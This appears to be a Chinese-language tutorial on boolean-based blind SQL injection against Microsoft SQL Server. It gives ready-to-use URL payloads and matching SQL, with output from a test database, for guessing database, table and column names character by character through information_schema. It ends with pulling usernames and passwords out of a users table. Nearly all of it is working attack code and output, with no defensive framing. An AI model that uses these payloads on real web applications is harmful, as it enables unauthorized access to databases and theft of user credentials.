0x00 记忆方式

and iif(判断条件 ,1,0);

正确时会和原来的数据一致,错误会不返回数据

0x01 基本数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 获取数据长度

  1. 1> select LEN(system_user);
  2. 2> go
  3. +---+
  4. | |
  5. +---+
  6. | 2 |
  7. +---+
  8. (1 rows affected)

0x03 读取当前连接的数据库

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)

数据库语句: select * from _article _where id =1 and 1=iif(LEFT(db_name(),1)=’t’,1,0)

  1. # 获取当前数据库第一个字符
  2. # 对得情况
  3. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='t',1,0);
  4. 2> go
  5. +----+----------+----------+
  6. | id | title | content |
  7. +----+----------+----------+
  8. | 1 | 测试标题 | 测试内容 |
  9. +----+----------+----------+
  10. (1 rows affected)
  11. # 错得情况
  12. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),1)='aaaa',1,0);
  13. 2> go
  14. +----+-----+--------+
  15. | id | title | content |
  16. +----+-----+--------+
  17. +----+-----+--------+
  18. (0 rows affected)
  1. # 获取当前数据库第二个字符
  2. # 对得情况
  3. 1> select * from article where id=1 and 1=iif(LEFT(db_name(),2)='te',1,0);
  4. 2> go
  5. +----+----------+----------+
  6. | id | title | content |
  7. +----+----------+----------+
  8. | 1 | 测试标题 | 测试内容 |
  9. +----+----------+----------+
  10. (1 rows affected)

0x04 猜库名

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT(db_name(1),1)=’m’,1,0)

  1. # 获取 1库第一个字符
  2. # 对得情况
  3. 1> select * from article where id=1 and 1=iif(LEFT(db_name(1),1)='m',1,0);
  4. 2> go
  5. +----+----------+----------+
  6. | id | title | content |
  7. +----+----------+----------+
  8. | 1 | 测试标题 | 测试内容 |
  9. +----+----------+----------+
  10. (1 rows affected)
  1. # 获取 1库第一个字符
  2. # 对得情况
  3. 1> select * from article where id=1 and 1=iif(LEFT(db_name(1),2)='ma',1,0)
  4. 2> go
  5. +----+----------+----------+
  6. | id | title | content |
  7. +----+----------+----------+
  8. | 1 | 测试标题 | 测试内容 |
  9. +----+----------+----------+
  10. (1 rows affected)

0x05 猜表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

修改 LEFT() 函数 第二个参数可以控制出来得数据

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1),1)=’a’,1,0)

  1. # 获取 当前库 1表得第一个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. table_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 1
  25. ),
  26. 1
  27. ) = 'a',
  28. 1,
  29. 0
  30. );
  31. 2> go
  32. +----+----------+----------+
  33. | id | title | content |
  34. +----+----------+----------+
  35. | 1 | 测试标题 | 测试内容 |
  36. +----+----------+----------+
  37. (1 rows affected)
  1. # 获取 当前库 1表得第二个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. table_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 1
  25. ),
  26. 2
  27. ) = 'ar',
  28. 1,
  29. 0
  30. );
  31. 2> go
  32. +----+----------+----------+
  33. | id | title | content |
  34. +----+----------+----------+
  35. | 1 | 测试标题 | 测试内容 |
  36. +----+----------+----------+
  37. (1 rows affected)

0x06 猜字段

注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段

查询不同的表可以这样
例如:
table_name=’要查询的表名’

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)

数据库语句: select * from article where id=1 and 1=iif(LEFT((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1),1)=’i’,1,0)

  1. # 获取当前库 users表 第一个字段第一个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. column_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  17. column_name
  18. FROM
  19. information_schema.columns
  20. WHERE
  21. table_catalog = db_name()
  22. AND table_name = 'users'
  23. ) AS a
  24. WHERE
  25. row_number = 1
  26. ),
  27. 1
  28. ) = 'i',
  29. 1,
  30. 0
  31. );
  32. 2> go
  33. +----+----------+----------+
  34. | id | title | content |
  35. +----+----------+----------+
  36. | 1 | 测试标题 | 测试内容 |
  37. +----+----------+----------+
  38. (1 rows affected)
  1. # 获取当前库 users表 第一个字段第二个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. column_name
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  17. column_name
  18. FROM
  19. information_schema.columns
  20. WHERE
  21. table_catalog = db_name()
  22. AND table_name = 'users'
  23. ) AS a
  24. WHERE
  25. row_number = 1
  26. ),
  27. 2
  28. ) = 'id',
  29. 1,
  30. 0
  31. );
  32. 2> go
  33. +----+----------+----------+
  34. | id | title | content |
  35. +----+----------+----------+
  36. | 1 | 测试标题 | 测试内容 |
  37. +----+----------+----------+
  38. (1 rows affected)

0x07 猜内容

注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段

获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password

查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1),1)=’t’,1,0)

数据库语句: select from article where id=1 and 1=iif(LEFT((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1),1)=’t’,1,0)

  1. # 查询users表 第一条数据, username 字段 前9个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. a.username
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. ),
  23. 9
  24. ) = 'test-user',
  25. 1,
  26. 0
  27. );
  28. 2> go
  29. +----+----------+----------+
  30. | id | title | content |
  31. +----+----------+----------+
  32. | 1 | 测试标题 | 测试内容 |
  33. +----+----------+----------+
  34. (1 rows affected)
  1. # 查询users表 第二条数据, password 字段 前6个字符
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = iif (
  9. LEFT (
  10. (
  11. SELECT
  12. a.password
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY password) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 2
  22. ),
  23. 6
  24. ) = '234567',
  25. 1,
  26. 0
  27. );
  28. 2> go
  29. +----+----------+----------+
  30. | id | title | content |
  31. +----+----------+----------+
  32. | 1 | 测试标题 | 测试内容 |
  33. +----+----------+----------+
  34. (1 rows affected)